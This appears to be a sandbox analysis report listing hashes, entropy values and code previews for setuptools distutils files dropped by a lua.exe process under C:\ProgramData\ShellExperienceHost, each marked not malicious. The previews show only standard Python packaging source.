SSDEEP:	192:c1NiDZ8TSFX1JdO32GO4DR8qq2jrTt2s0KeBhebXa/prFWH8MnT7jGyToTT7vTt:qjRRO4Njos0vYkp+8MTXGykT7J
MD5:	D3CE1DD7CF436A7AFD2BBF9D08C657E9
SHA1:	D2CAE77BFA9716331E7DFCE998B95D70FCAD3865
SHA-256:	DA36AAF7DEBCAEDDA9B91543071D476CD897BF6EEE3A4F22744FF894F7FFDD53
SHA-512:	D7D16090028E53ADCB1467C3D1D6A016DA4B8EC0A88EBD20362FEB054DF1B76082609FBEBBA56AFD02D764948ED957B7A507E45FE709FCDB3C18AD9D37D3A2EE
Malicious:	false
Preview:	"""distutils.command.register..Implements the Distutils 'register' command (register with the repository).."""..# created 2002/10/21, Richard Jones..import getpass.import io.import urllib.parse, urllib.request.from warnings import warn..from distutils.core import PyPIRCCommand.from distutils.errors import *.from distutils import log..class register(PyPIRCCommand):.. description = ("register the distribution with the Python package index"). user_options = PyPIRCCommand.user_options + [. ('list-classifiers', None,. 'list the valid Trove classifiers'),. ('strict', None ,. 'Will stop the registering if the meta-data are not fully compliant'). ]. boolean_options = PyPIRCCommand.boolean_options + [. 'verify', 'list-classifiers', 'strict'].. sub_commands = [('check', lambda self: True)].. def initialize_options(self):. PyPIRCCommand.initialize_options(self). self.list_classifiers = 0. self.strict = 0.. def fina

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\sdist.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19005
Entropy (8bit):	4.31120287481556
Encrypted:	false
SSDEEP:	384:0u4qs+pU6JJMoanbGfXK4thY3V4xByERlt9CPNPqPbJtRaTFwlHBwE2:0u4qsgpJ+oaniXK4thY3V4xNRDQCPbPs
MD5:	DC4AF0791ADAB9D5AFEB0EF74CC1C749
SHA1:	C511E6B0BEF527A736CC3CC59DF78ECD371A2EE0
SHA-256:	AA8B498C03B3CA1263AB6FA80C89A3345ACEB5A4A778414325307EB04935C275
SHA-512:	B58E2303B48D11F6336BC91B9648EE072194DAF2245E64408A243FEE01375B87BC98B90C84EE9C6586F5AEC4AE9FD5DBD5F012EED05EEDA9881F25767BA583EE
Malicious:	false
Preview:	"""distutils.command.sdist..Implements the Distutils 'sdist' command (create a source distribution)."""..import os.import sys.from glob import glob.from warnings import warn..from distutils.core import Command.from distutils import dir_util.from distutils import file_util.from distutils import archive_util.from distutils.text_file import TextFile.from distutils.filelist import FileList.from distutils import log.from distutils.util import convert_path.from distutils.errors import DistutilsTemplateError, DistutilsOptionError...def show_formats():. """Print all possible values for the 'formats' option (used by. the "--help-formats" command-line option).. """. from distutils.fancy_getopt import FancyGetopt. from distutils.archive_util import ARCHIVE_FORMATS. formats = []. for format in ARCHIVE_FORMATS.keys():. formats.append(("formats=" + format, None,. ARCHIVE_FORMATS[format][2])). formats.sort(). FancyGetopt(formats).print_help(.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\upload.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7597
Entropy (8bit):	4.462182458964616
Encrypted:	false
SSDEEP:	96:+g/GDvbNb8RQxJQwudx/uaQB9EGvBamyNGM/7XqZzmI0voscW:+yG98RgSdQz/yNl6ht0vos3
MD5:	E6D24C1DF6032EA996227F25F65027D2
SHA1:	11D5208EC4E3CC0AEDA3C2DCE24067CEEED66298
SHA-256:	04B3B5C3B79202AB028C22D7B5FFC24554A3C05D569B2381C8654635D710F286
SHA-512:	0AF8F3617F9DEF35EEAFE347EAA066683AF6CEC1F3CC947EAB52A9D2A610DE10AB770C22BDEE4CD327C6C63C83ACA6DAE9673AD6A386D0CD32FBE5FEBA0C727A
Malicious:	false
Preview:	""".distutils.command.upload..Implements the Distutils 'upload' subcommand (upload package to a package.index).."""..import os.import io.import hashlib.from base64 import standard_b64encode.from urllib.request import urlopen, Request, HTTPError.from urllib.parse import urlparse.from distutils.errors import DistutilsError, DistutilsOptionError.from distutils.core import PyPIRCCommand.from distutils.spawn import spawn.from distutils import log...# PyPI Warehouse supports MD5, SHA256, and Blake2 (blake2-256).# https://bugs.python.org/issue40698._FILE_CONTENT_DIGESTS = {. "md5_digest": getattr(hashlib, "md5", None),. "sha256_digest": getattr(hashlib, "sha256", None),. "blake2_256_digest": getattr(hashlib, "blake2b", None),.}...class upload(PyPIRCCommand):.. description = "upload binary package to PyPI".. user_options = PyPIRCCommand.user_options + [. ('sign', 's',. 'sign files to upload using gpg'),. ('identity=', 'i', 'GPG identity used to sign files')

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\config.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4827
Entropy (8bit):	4.251119264194311
Encrypted:	false
SSDEEP:	96:ULlm1+jg2g978d8Gjw6Wk+2YNF1l2s966b0VqnjN:ULli+XgZ8d8+hb+2YNF1l2s9xwcnjN
MD5:	B5ECBA3A7BA3F8976043A7BA42C537B9
SHA1:	DC5759F954D082A6F9609119646336A0532E90F3
SHA-256:	76D1E06E5C7D2617F2ACAC75F89EC9971C3F7FBB3C65B3C54228B65163136696
SHA-512:	2F1413D096DF1F4C7B3E242DD9D6679C2357905AD33B77770D540B94B52D1B18E20208BDCDBEAD1402BF88CCBF855E5018CECDD65605AE9145630579C89B6FEB
Malicious:	false
Preview:	"""distutils.pypirc..Provides the PyPIRCCommand class, the base class for the command classes.that uses .pypirc in the distutils.command package..""".import os.from configparser import RawConfigParser..from distutils.cmd import Command..DEFAULT_PYPIRC = """\.[distutils].index-servers =. pypi..[pypi].username:%s.password:%s."""..class PyPIRCCommand(Command):. """Base command that knows how to handle the .pypirc file. """. DEFAULT_REPOSITORY = 'https://upload.pypi.org/legacy/'. DEFAULT_REALM = 'pypi'. repository = None. realm = None.. user_options = [. ('repository=', 'r',. "url of repository [default: %s]" % \. DEFAULT_REPOSITORY),. ('show-response', None,. 'display full response text from server')].. boolean_options = ['show-response'].. def _get_rc_file(self):. """Returns rc file path.""". return os.path.join(os.path.expanduser('~'), '.pypirc').. def _store_pypirc(self, username, password):.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\core.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8876
Entropy (8bit):	4.49115651541053
Encrypted:	false
SSDEEP:	192:mrxst8vM8Bi8UFjQ35XvxzjzL95Ck7l5rT6l/+yBlYONpbPZe38RAp:mrxU8PUW5X5zjuk7l92lYOVqOG
MD5:	9ABF9A6C3C899621C428D944467C1C88
SHA1:	1F569710D45AA377F8E2E36D1683826C0A918F4B
SHA-256:	8DB74E92938AD3DC62FB9EAF861C2F9F77D87612DBE4324EF2ADCAD5F9D0CF44
SHA-512:	CAC0750F267EF29691B1CACAC4085641BE91AAE7C90929E0E4B2A0ABB568A4A16D29FA59FD3D2C0CCE16F46F9F3095E3A7A91C1CADB059250ED2420902214120
Malicious:	false
Preview:	"""distutils.core..The only module that needs to be imported to use the Distutils; provides.the 'setup' function (which is to be called from the setup script). Also.indirectly provides the Distribution and Command classes, although they are.really defined in distutils.dist and distutils.cmd.."""..import os.import sys..from distutils.debug import DEBUG.from distutils.errors import *..# Mainly import these so setup scripts can "from distutils.core import" them..from distutils.dist import Distribution.from distutils.cmd import Command.from distutils.config import PyPIRCCommand.from distutils.extension import Extension..# This is a barebones help message generated displayed when the user.# runs the setup script with no arguments at all. More useful help.# is generated with various --help options: global help, list commands,.# and per-command help..USAGE = """\.usage: %(script)s [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]. or: %(script)s --help [cmd1 cmd2 ...]. or: %(script)

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\cygwinccompiler.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16380
Entropy (8bit):	4.588517615626846
Encrypted:	false
SSDEEP:	384:CjOjKRk+zDAHTSq8fSE/0MFrdSrxzoOWBljV68:T2Rk+XAEfFFJSV8nl7
MD5:	545583F2C92510C8F03CB6A4A75CBC43
SHA1:	31858F4364E14AB71A0A1C463A3C85C9FACB71A6
SHA-256:	F54E0902EB14CE5006265D18E674E83E443795DCEC780B62C9EE37E26C09D28C
SHA-512:	C476B98B911B283F8548DEE0B71D7746841B1DA4CF8A7BCD56672BB9A76361E597CF26DEE11251DF6C14CA710FEE2069A23E75D8DD1FF35FE32B12A19E2735F0
Malicious:	false
Preview:	"""distutils.cygwinccompiler..Provides the CygwinCCompiler class, a subclass of UnixCCompiler that.handles the Cygwin port of the GNU C compiler to Windows. It also contains.the Mingw32CCompiler class which handles the mingw32 port of GCC (same as.cygwin in no-cygwin mode).."""..# problems:.#.# * if you use a msvc compiled python version (1.5.2).# 1. you have to insert a __GNUC__ section in its config.h.# 2. you have to generate an import library for its dll.# - create a def-file for python??.dll.# - create an import library using.# dlltool --dllname python15.dll --def python15.def \.# --output-lib libpython15.a.#.# see also http://starship.python.net/crew/kernr/mingw32/Notes.html.#.# * We put export_symbols in a def-file, and don't use.# --export-all-symbols because it doesn't worked reliable in some.# tested configurations. And because other windows compilers also.# need their symbols specified this no serious problem..#.# test

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\debug.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	139
Entropy (8bit):	4.871969431047891
Encrypted:	false
SSDEEP:	3:JSxPDbsQhgXFuLc1FKRpxRIVRjSA07A1xpnV6SWhGOhgXCu:a80gVuTR5IVQFKfV6Zgn
MD5:	BC1E4C71305DFBEEBA03CD8E4E56E931
SHA1:	366246D9AB8F12833B1B2765FADE51BB635D49CA
SHA-256:	37A32B4C0A8AEA5F52564EAD5B0791D74F0F33C3A5EEA3657F257E9C770B86C6
SHA-512:	876D9D1FA517468B7D84C7E4464916CBC50F923E764FAA274CCD2E6F2B8E3D350A7B2A3E57C26AC287E83119A7CDDCD3EF11FFB1EC2B513B3F899373248FCB36
Malicious:	false
Preview:	import os..# If DISTUTILS_DEBUG is anything other than the empty string, we run in.# debug mode..DEBUG = os.environ.get('DISTUTILS_DEBUG').

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\dep_util.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3491
Entropy (8bit):	4.407774250090949
Encrypted:	false
SSDEEP:	96:6Otegu7byq0MwMCTKJReddOPF/c4fRIaLRjWWAkh9n/:6Okgu7bR0jKHGdO9dJ9jEk/
MD5:	2C802D52E0F1E97C4C917B11868BD899
SHA1:	C880AD7D47A80032848486533199C76BB73020B5
SHA-256:	1AE47D230FE3CD9464C9E989E475FCAC1FF0446C642017019B5AA1E78AFBCE19
SHA-512:	33BA5D0502A6D8B6DEE7E12DBA940F0C207A185B3302D7CD92D985A0DB4A544B00049EC208A01993B441CC173D4E9AF88992D5C181D1730AC68ADCDC433333A3
Malicious:	false
Preview:	"""distutils.dep_util..Utility functions for simple, timestamp-based dependency of files.and groups of files; also, function based entirely on such.timestamp dependency analysis."""..import os.from distutils.errors import DistutilsFileError...def newer (source, target):. """Return true if 'source' exists and is more recently modified than. 'target', or if 'source' exists and 'target' doesn't. Return false if. both exist and 'target' is the same age or younger than 'source'.. Raise DistutilsFileError if 'source' does not exist.. """. if not os.path.exists(source):. raise DistutilsFileError("file '%s' does not exist" %. os.path.abspath(source)). if not os.path.exists(target):. return 1.. from stat import ST_MTIME. mtime1 = os.stat(source)[ST_MTIME]. mtime2 = os.stat(target)[ST_MTIME].. return mtime1 > mtime2..# newer ()...def newer_pairwise (sources, targets):. """Walk two filename lists in parallel, testi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\dir_util.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7778
Entropy (8bit):	4.426903067941429
Encrypted:	false
SSDEEP:	96:Zum2Z694nC0NzLoBJmIJDPSw9f6Vkvk1pN0/u7K6Rw5eQ8AycxRzuRoFnzYjam/f:MTn7LsTS6yVtZK6Rw5wQxJ/zcam/3v
MD5:	43032AA896D095B071B5C267AB190816
SHA1:	69936257AF5D2DF8D491E0E9B4B6EE39239AEC37
SHA-256:	5308413944DC57AE464F071EE123EE4D747C67CAB72D811C9ADB6A7066F46D8A
SHA-512:	32FD10B0BF039028E4769419603B726A18948D7730A0CB320878C28C45A4EA5AAA871A6ECCBD1D44C339F4412882F0E50BB07E20248E0D97300DD72C45991B3B
Malicious:	false
Preview:	"""distutils.dir_util..Utility functions for manipulating directories and directory trees."""..import os.import errno.from distutils.errors import DistutilsFileError, DistutilsInternalError.from distutils import log..# cache for by mkpath() -- in addition to cheapening redundant calls,.# eliminates redundant "creating /foo/bar/baz" messages in dry-run mode._path_created = {}..# I don't use os.makedirs because a) it's new to Python 1.5.2, and.# b) it blows up if the directory already exists (I want to silently.# succeed in that case)..def mkpath(name, mode=0o777, verbose=1, dry_run=0):. """Create a directory and any missing ancestor directories... If the directory already exists (or if 'name' is the empty string, which. means the current directory, which of course exists), then do nothing.. Raise DistutilsFileError if unable to create some directory along the way. (eg. some sub-path exists, but is a file rather than a directory).. If 'verbose' is true, print a one-line

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\dist.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	50421
Entropy (8bit):	4.341278659071264
Encrypted:	false
SSDEEP:	768:n9vJxZtPjZK+ibRifrKcdCATMeQ4jMR8lC2RftetAs3SbTjSLFpxgxOe5pNnnTuN:n9RxZRjZK78frKcx/dfpmz
MD5:	713F0A03CE548D3E19C35DF30C71FB4D
SHA1:	E657D449C39EDFB96D084C8C7FD33A998BE12469
SHA-256:	062B9FE9C6BCBA215F31271116C6142AD6F99DE30FB712B146D5E7E74FF57F75
SHA-512:	6EEB42FB65E85CD5D688AFD21499A7C23134BDCFF6A4B4E19513424E327621408C7979B15A1B2C95F8D5FA9EF272C124206C1ADBA4565E949B48053A8AD564CA
Malicious:	false
Preview:	"""distutils.dist..Provides the Distribution class, which represents the module distribution.being built/installed/distributed.."""..import sys.import os.import re.from email import message_from_file..try:. import warnings.except ImportError:. warnings = None..from distutils.errors import .from distutils.fancy_getopt import FancyGetopt, translate_longopt.from distutils.util import check_environ, strtobool, rfc822_escape.from distutils import log.from distutils.debug import DEBUG..# Regex to define acceptable Distutils command names. This is not quite.# the same as a Python NAME -- I don't allow leading underscores. The fact.# that they're very similar is no coincidence; the default naming scheme is.# to look for a Python module named after the command..command_re = re.compile(r'^[a-zA-Z]([a-zA-Z0-9_])$')...def _ensure_list(value, fieldname):. if isinstance(value, str):. # a string containing comma separated values is okay. It will. # be converted to a list

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\errors.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3577
Entropy (8bit):	4.5739788138504816
Encrypted:	false
SSDEEP:	48:s1/iD2yov4FSbqVfUVlDFmSJ012I4qCdrKtm7M+Fn1H0zgaPx9:cO2yI4FVNU5hC12IbcrKtehFEx9
MD5:	39513F95046CDA5D9891939DD7B19E6F
SHA1:	5D7DA9E6F97603574AAB1262CFE0AE5BCC293327
SHA-256:	62BEAD29919DCC1A0D8B9DEF06D8AAD1427FFD7D390A6C5275026A3966B0E926
SHA-512:	5645D1D9942D5920BACFFDF0368B533DE69A1888F8524D3A4B50375640FB3E8DDDC76DCBC41127E52DE2663583D83D04B44FF106F5528C39F60F2B7723D03FA8
Malicious:	false
Preview:	"""distutils.errors..Provides exceptions used by the Distutils modules. Note that Distutils.modules may raise standard exceptions; in particular, SystemExit is.usually raised for errors that are obviously the end-user's fault.(eg. bad command-line arguments)...This module is safe to use in "from ... import *" mode; it only exports.symbols whose names start with "Distutils" and end with "Error"."""..class DistutilsError (Exception):. """The root of all Distutils evil.""". pass..class DistutilsModuleError (DistutilsError):. """Unable to load an expected module, or to find an expected class. within some module (in particular, command modules and classes).""". pass..class DistutilsClassError (DistutilsError):. """Some command class (or possibly distribution class, if anyone. feels a need to subclass Distribution) is found not to be holding. up its end of the bargain, ie. implementing some part of the. "command "interface.""". pass..class DistutilsGetoptError

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\extension.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10515
Entropy (8bit):	4.234727367822918
Encrypted:	false
SSDEEP:	96:WyG2P2tXyqbUdJet90FM7RAxV999LK/O5rueB1fOsqZDzn2sPaj5Oo/ieCWSTa31:W6Pi30Js91E/LFnqD26DTaB5owy+biG
MD5:	6933B68FD6A3C7967624EA292FE3AC2D
SHA1:	5BFCC0C3866986329999398956FC88DBF62CB16B
SHA-256:	6D36F74340A87AF18A62FE5D5F596CFBE2E7F2D941D3E5043AC8BD070CE567EB
SHA-512:	80760546335280613B893AF8F8A30C3514DC4E3865DE1B2EFF85615EF48ECE1BF7E2EAA0B58C7D8F97ABFB0E3D21EE77DD89727A69580556A117B91DA81C7355
Malicious:	false
Preview:	"""distutils.extension..Provides the Extension class, used to describe C/C++ extension.modules in setup scripts."""..import os.import warnings..# This class is really only used by the "build_ext" command, so it might.# make sense to put it in distutils.command.build_ext. However, that.# module is already big enough, and I want to make this class a bit more.# complex to simplify some common cases ("foo" module in "foo.c") and do.# better error-checking ("foo.c" actually exists)..#.# Also, putting this in build_ext.py means every setup script would have to.# import that large-ish module (indirectly, through distutils.core) in.# order to do anything...class Extension:. """Just a collection of attributes that describes an extension. module and everything needed to build it (hopefully in a portable. way, but there are hooks that let you be as unportable as you need)... Instance attributes:. name : string. the full name of the extension, including any packages -- ie.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\fancy_getopt.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17784
Entropy (8bit):	4.24009972169642
Encrypted:	false
SSDEEP:	192:AFGMO6bZe607HzPzFOjDCmG3F49uSNe1l9bgoRhVy8bJnzSoNX0wOVZxfZzpC:ApRbIrbzgj2LL3bRRhVJbdxNkw6V+
MD5:	CE4BA924F4F8C9004ADA878E8484C40C
SHA1:	36C5D8DD08F0E5B86865110FC93116E1019AC118
SHA-256:	38FC69D82C478B5629FDDD43F09C56E147AAF5F0BBD6D7A040569A7E1E7C1865
SHA-512:	6AE53235B0C199912AB919002E620AB25C69A1376E19CEDF4F36875C0D09C96B914870F6C1196C60692680115E231E5B5D81256EBD2FCB64826DAACEF0E8BFDD
Malicious:	false
Preview:	"""distutils.fancy_getopt..Wrapper around the standard getopt module that provides the following.additional features:. * short and long options are tied together. * options have help strings, so fancy_getopt could potentially. create a complete usage summary. * options set attributes of a passed-in object."""..import sys, string, re.import getopt.from distutils.errors import ..# Much like command_re in distutils.core, this is close to but not quite.# the same as a Python NAME -- except, in the spirit of most GNU.# utilities, we use '-' in place of '_'. (The spirit of LISP lives on!).# The similarities to NAME are again not a coincidence....longopt_pat = r'[a-zA-Z](?:[a-zA-Z0-9-])'.longopt_re = re.compile(r'^%s$' % longopt_pat)..# For recognizing "negative alias" options, eg. "quiet=!verbose".neg_alias_re = re.compile("^(%s)=!(%s)$" % (longopt_pat, longopt_pat))..# This is used to translate long options to legitimate Python identifiers.# (for use as attributes of some object)..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\file_util.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8148
Entropy (8bit):	4.3789590455587835
Encrypted:	false
SSDEEP:	96:IwRUX/zJoBZkkiE7CSW3K20Lz8iZFAVyDU5HytzkRtjslPg01pY2I8:IyC7yBZk/E7Jb7zL8V5MtzKslPgQY2I8
MD5:	2C9484EED655020A27553FCF6453D5B3
SHA1:	D5EB38C55AC9BF9385790082DC1CDDCDEEB67F9F
SHA-256:	D2152A7C8B4DFF1D83562851D0C1DD03828231508E3BC568072685A7F6BA3038
SHA-512:	1D40B1840B6DE6D8DBF54CB431BDD0F5AC41BB508B67580F7B133F5F230B4FC598D27330871DA6842E1697B6B9947BD7A73A83ADEFA8E16D99637923CBB24E6B
Malicious:	false
Preview:	"""distutils.file_util..Utility functions for operating on single files.."""..import os.from distutils.errors import DistutilsFileError.from distutils import log..# for generating verbose output in 'copy_file()'._copy_action = { None: 'copying',. 'hard': 'hard linking',. 'sym': 'symbolically linking' }...def _copy_file_contents(src, dst, buffer_size=16*1024):. """Copy the file 'src' to 'dst'; both must be filenames. Any error. opening either file, reading from 'src', or writing to 'dst', raises. DistutilsFileError. Data is read/written in chunks of 'buffer_size'. bytes (default 16k). No attempt is made to handle anything apart from. regular files.. """. # Stolen from shutil module in the standard library, but with. # custom error-handling added.. fsrc = None. fdst = None. try:. try:. fsrc = open(src, 'rb'). except OSError as e:. raise DistutilsFileError("could not open '%s': %s" %

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\filelist.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12832
Entropy (8bit):	4.365661846963114
Encrypted:	false
SSDEEP:	192:dv4ckzPMFrQ6kcrg/LEQ9rAKXLtrGLqq/T3Jk1CQv2l5rPjh7i9Kgymr:eFzsdvrg/LEerBLULqqrJJR5DjdS
MD5:	1CA7EBC432F1CCE5E8FB81012028798B
SHA1:	3414DA87D51057725E94C73E0ECCD566C0F8507C
SHA-256:	F1B471873A7616C6A81D3ED3B8A0F842372E87F07D3B0FF14EDFE1B5926F3764
SHA-512:	EAE938146367D1448B5049101F71771F9DCCAA9BC044D16CD0383D74C48DB06782C7F2240D9AAD09A2DE7702CEFDA7F13720EE072FB7511D84096DA9F9308640
Malicious:	false
Preview:	"""distutils.filelist..Provides the FileList class, used for poking about the filesystem.and building lists of files.."""..import os, re.import fnmatch.import functools.from distutils.util import convert_path.from distutils.errors import DistutilsTemplateError, DistutilsInternalError.from distutils import log..class FileList:. """A list of files built by on exploring the filesystem and filtered by. applying various patterns to what we find there... Instance attributes:. dir. directory from which files will be taken -- only used if. 'allfiles' not supplied to constructor. files. list of filenames currently being built/filtered/manipulated. allfiles. complete list of files under consideration (ie. without any. filtering applied). """.. def __init__(self, warn=None, debug_print=None):. # ignore argument to FileList, but keep them for backwards. # compatibility. self.allfiles = None. self.files = [

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\log.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.521526473215749
Encrypted:	false
SSDEEP:	24:rOz4i35qojNTloyDNc8Ach+vDVLs3vcfvzIb7YdyOYmRIZSZlNeJaghlUnWKe:Cz4iIW5oim8d+D+fcnz07oyOFNpghcW7
MD5:	3728F96C2FCA304C30C04DFA883C3076
SHA1:	616D8F2A221C3BB746FD4F245DD24FD3589090BD
SHA-256:	8560667540B62BDDBB41C56FDD110C5B71CC3DC97171C3D09E0C4B4AE517425D
SHA-512:	0D92366F5A1D5335A4FE977B5586F393AB5A4E67055FD4BEB6637C1AEE6A41D4ECE672224F68FA4BDEF8B7FAABC970E7A8BEA15B5038DBE1234B078D17D14E81
Malicious:	false
Preview:	"""A simple log mechanism styled after PEP 282."""..# The class here is styled after PEP 282 so that it could later be.# replaced with a standard Python logging implementation...DEBUG = 1.INFO = 2.WARN = 3.ERROR = 4.FATAL = 5..import sys..class Log:.. def __init__(self, threshold=WARN):. self.threshold = threshold.. def _log(self, level, msg, args):. if level not in (DEBUG, INFO, WARN, ERROR, FATAL):. raise ValueError('%s wrong log level' % str(level)).. if level >= self.threshold:. if args:. msg = msg % args. if level in (WARN, ERROR, FATAL):. stream = sys.stderr. else:. stream = sys.stdout. try:. stream.write('%s\n' % msg). except UnicodeEncodeError:. # emulate backslashreplace error handler. encoding = stream.encoding. msg = msg.encode(encoding, "backslashreplace").decode(encoding).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\msvc9compiler.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	30453
Entropy (8bit):	4.43466757083189
Encrypted:	false
SSDEEP:	384:5D3ZnHntmCEyqGAAN12tqEs6tIu0Jy4NuaRr8ucAjQ9lcaO2xoXIvSbMLOPihy:5D3ZnHnQCE/F9qETKcJw3j6w
MD5:	B385BCCC3EDA40683F52B485CDC7474B
SHA1:	04ED6E125707BBDEE2D8BEC80BE3E75819C61A2F
SHA-256:	BAFD1301FA16AF11013902FE676BB0B39838017A133DA85410CBAAE852E40986
SHA-512:	F5B1A15546933C0EBAE04A12A62444592F3FA20A8C3413865B02A92DB5BDEEE60BA039BEE534A2D3AF30381177FD2B878E14D9BFBD133939B54BF498C0A95B36
Malicious:	false
Preview:	"""distutils.msvc9compiler..Contains MSVCCompiler, an implementation of the abstract CCompiler class.for the Microsoft Visual Studio 2008...The module is compatible with VS 2005 and VS 2008. You can find legacy support.for older versions of VS in distutils.msvccompiler.."""..# Written by Perry Stoll.# hacked by Robin Becker and Thomas Heller to do a better job of.# finding DevStudio (through the registry).# ported to VS2005 and VS 2008 by Christian Heimes..import os.import subprocess.import sys.import re..from distutils.errors import DistutilsExecError, DistutilsPlatformError, \. CompileError, LibError, LinkError.from distutils.ccompiler import CCompiler, gen_lib_options.from distutils import log.from distutils.util import get_platform..import winreg..RegOpenKeyEx = winreg.OpenKeyEx.RegEnumKey = winreg.EnumKey.RegEnumValue = winreg.EnumValue.RegError = winreg.error..HKEYS = (winreg.HKEY_USERS,. winreg.HKEY_CURRENT_USER,. winreg.HKEY_LOCAL_M

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\msvccompiler.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	23540
Entropy (8bit):	4.371122234825875
Encrypted:	false
SSDEEP:	384:ZHiZiJWHk0rqGA/1NYI84Ju+fNuaRr8ucAjQFoLOPih+jHVBsl:ZHwiJWHk02F/4Q0+Aw3jQHVBsl
MD5:	C279F5A4CD8C7C1FC3AB787542719F23
SHA1:	AF7C82F1C33E5209A2107B84D6CEAB95F3DD9817
SHA-256:	658B27520202E2D653D969096D39135325520807369C533D0D5288B887CF054D
SHA-512:	13EE3E82C4AB9A46D44C5A370A3DD698F60876288700A52A346A251C9DFB9C4E933BE45728C9BE8EF05190F951B748CBBD498B80C04387C7924A1723A1E0676E
Malicious:	false
Preview:	"""distutils.msvccompiler..Contains MSVCCompiler, an implementation of the abstract CCompiler class.for the Microsoft Visual Studio.."""..# Written by Perry Stoll.# hacked by Robin Becker and Thomas Heller to do a better job of.# finding DevStudio (through the registry)..import sys, os.from distutils.errors import \. DistutilsExecError, DistutilsPlatformError, \. CompileError, LibError, LinkError.from distutils.ccompiler import \. CCompiler, gen_lib_options.from distutils import log.._can_read_reg = False.try:. import winreg.. _can_read_reg = True. hkey_mod = winreg.. RegOpenKeyEx = winreg.OpenKeyEx. RegEnumKey = winreg.EnumKey. RegEnumValue = winreg.EnumValue. RegError = winreg.error..except ImportError:. try:. import win32api. import win32con. _can_read_reg = True. hkey_mod = win32con.. RegOpenKeyEx = win32api.RegOpenKeyEx. RegEnumKey = win32api.RegEnumKey. RegEnumValue = win32api.RegEnumValue.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\py35compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	455
Entropy (8bit):	4.484072139258454
Encrypted:	false
SSDEEP:	12:kR/pPe6L9zAOwOfDSqxVMTU9Fmet690e6UfAEe6M1e67:kJpLtxVMTUB6SUfAoMJ7
MD5:	4DA81D39217472B61C1C6F60C3D71948
SHA1:	7AF444E482F548DF27E4CC127B31A9CCE3D55845
SHA-256:	FAC935BC122C3A01FE0286E32186CAFCE12374917FE78525FC3D44884F5733F7
SHA-512:	50B2AC2802B8792CF3CFBE0DFAA1DBC76088AE58EF8E156E3FDFA9FCEA9597340209FF6DAF83FB2EB465FDEEE895029403A05A619DCC073CFE2B14F4BA70BBA7
Malicious:	false
Preview:	import sys.import subprocess...def __optim_args_from_interpreter_flags():. """Return a list of command-line arguments reproducing the current. optimization settings in sys.flags.""". args = []. value = sys.flags.optimize. if value > 0:. args.append("-" + "O" * value). return args..._optim_args_from_interpreter_flags = getattr(. subprocess,. "_optim_args_from_interpreter_flags",. __optim_args_from_interpreter_flags,.).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\py38compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	212
Entropy (8bit):	4.238104684575377
Encrypted:	false
SSDEEP:	6:lOWMWFBtsWtAlVQhzVVQvwRSVVQLEMdxQjMpLXw2/yxAF8FBtsWv:Ng2AlihL6wRieHGIRw26tgo
MD5:	2A095F39D475FA9A1E953CA79F67333F
SHA1:	1E9589FB7E3512F4CABEC2EDB5E26F991DE9170F
SHA-256:	208EDD741C4E8A30BBB8D378CFFE3A1D8523C184C960C3622C9A064E8AE6666D
SHA-512:	180544D69C012A21855FA1DD65AD4F8B813D3F9800B4C858448F1674E653C4E704AD6789BC3C2E441B8FA8D9B8E6D12BD2E323A6B431454F1CAEE58A6F74D1C5
Malicious:	false
